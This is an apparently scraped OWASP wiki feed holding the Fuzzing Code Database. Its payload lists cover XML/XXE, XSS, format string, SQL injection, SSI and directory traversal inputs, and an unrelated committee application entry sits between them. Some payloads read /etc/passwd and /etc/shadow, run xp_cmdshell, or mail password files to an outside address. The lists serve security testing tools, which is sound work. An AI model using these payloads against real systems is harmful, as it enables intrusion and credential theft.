&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
==== Project Identification ====&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} &lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Global_Conferences_Committee_-_Application_2&amp;diff=73558</id>
		<title>Global Conferences Committee - Application 2</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Global_Conferences_Committee_-_Application_2&amp;diff=73558"/>
				<updated>2009-11-16T23:48:32Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[How to Join a Committee|Click here to return to 'How to Join a Committee' page]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''COMMITTEE APPLICATION FORM''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;|'''Applicant's Name'''&lt;br /&gt;
 | colspan=&amp;quot;1&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;Lucas C. Ferreira.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| '''Current and past OWASP Roles''' &lt;br /&gt;
 | colspan=&amp;quot;1&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|OWASP Brazilian Chapter member, AppSec Brasil 2009 Chair.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:25%; background:#7B8ABD&amp;quot; align=&amp;quot;center&amp;quot;| '''Committee Applying for''' &lt;br /&gt;
 | colspan=&amp;quot;1&amp;quot; style=&amp;quot;width:85%; background:#cccccc&amp;quot; align=&amp;quot;left&amp;quot;|OWASP Global Conferences Committee.&lt;br /&gt;
 |}&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
Please be aware that for an application to be considered by the board, '''you MUST have 5 recommendations'''.  &lt;br /&gt;
An incomplete application will not be considered for vote.&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;8&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot;|&amp;lt;font color=&amp;quot;white&amp;quot;&amp;gt;'''COMMITTEE RECOMMENDATIONS''' &lt;br /&gt;
 |- &lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:white; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#7B8ABD; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''Who Recommends/Name''' &lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#7B8ABD; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''Role in OWASP'''&lt;br /&gt;
 ! align=&amp;quot;center&amp;quot; style=&amp;quot;background:#7B8ABD; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''Recommendation Content''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:3%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''1'''&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Eduardo Vianna de Camargo Neves&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| GEC Member&lt;br /&gt;
 | style=&amp;quot;width:57%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| An outstanding OWASP Member that allocated heart and soul to make the OWASP AppSec Brasil 2009 happens and is already doing the same for the 2010 Edition. Moreover, Lucas is a high evangelist of OWASP resources within the Brazilian IT Community with a strong presence on the Government Sector and Academia.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:3%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''2'''&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Pravir Chandra&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| GPC Member&lt;br /&gt;
 | style=&amp;quot;width:57%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Lucas is highly motivated and actually executes on his commitments very well. He did a great job in organizing AppSec Brasil 2009 and would be a great asset for the Global Conferences Committee.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:3%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''3'''&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Matt Tesauro&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| GPC Member&lt;br /&gt;
 | style=&amp;quot;width:57%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Lucas has already demonstrated that he's qualified for this position based on the success of AppSec Brasil 2009.  He went from zero to conference is a pretty short window.  Not only did he pull off a successful conference, he did so under fire - he lost several speakers due to the flu, I had a crazy mishap with my flights and barely made the first day of the class I was teaching.  Under all this, he kept his cool and keep the conference on track.  I suspect that the only reason I know about these issues is I was both an instructor and speaker.  For those just attending the conference, they would have only seen a smoothly running gig.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:3%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''4'''&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Wagner Elias&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Brazil Chapter Leader&lt;br /&gt;
 | style=&amp;quot;width:57%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;| Lucas is the member who contributes most to the growth of the Brazil chapter, this is due to the excellent organization has done in the first AppSec Brazil. No doubt he is a great name for a Committee.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:3%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|'''5'''&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:20%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 | style=&amp;quot;width:57%; background:#cccccc&amp;quot; align=&amp;quot;center&amp;quot;|&lt;br /&gt;
 |}&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67504</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67504"/>
				<updated>2009-08-11T19:29:37Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements''&lt;br /&gt;
&lt;br /&gt;
* 15 new XML Statements&lt;br /&gt;
* 93 new SQL Injections Statements&lt;br /&gt;
* 67 new Traversal Directory Statements&lt;br /&gt;
* Delete 33 XSS Statement Duplicate&lt;br /&gt;
* 30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
